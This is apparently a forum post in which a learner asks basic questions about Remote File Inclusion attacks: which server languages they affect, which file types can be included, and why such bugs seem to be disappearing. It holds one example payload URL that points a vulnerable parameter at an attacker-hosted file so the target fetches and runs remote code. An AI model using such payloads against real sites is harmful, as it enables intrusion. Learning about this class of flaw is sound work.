Hi guys,
i have been started to learn/read about RFI attacks and i have readed some books,documents and some tutorials regarding this.
At the i have been ended up with some questions,i tought it would be good to ask here
here are my questions:
1)does RFI attacks only works with the php language?
2)dont this attack work on other server side scripting languages such as jsp,asp and other server side scripting languages?
3)if yes why?
4)is this the one and only form of RFI injection?
http://www.target.com/vuln_page.php?file=http://attacker.com/malicious
5)Also what types of files can be injected in the space "malicious"
is this only limited to php and txt files ?
6)why this class of vulnerability is dying very fast ?,because when i checked in sites like 1337day and exploit-db for these kind of bugs
i had seen that last RFI has been posted before 3-4 months,so it seems this breed of bug is dying fast.
Looking for some answers..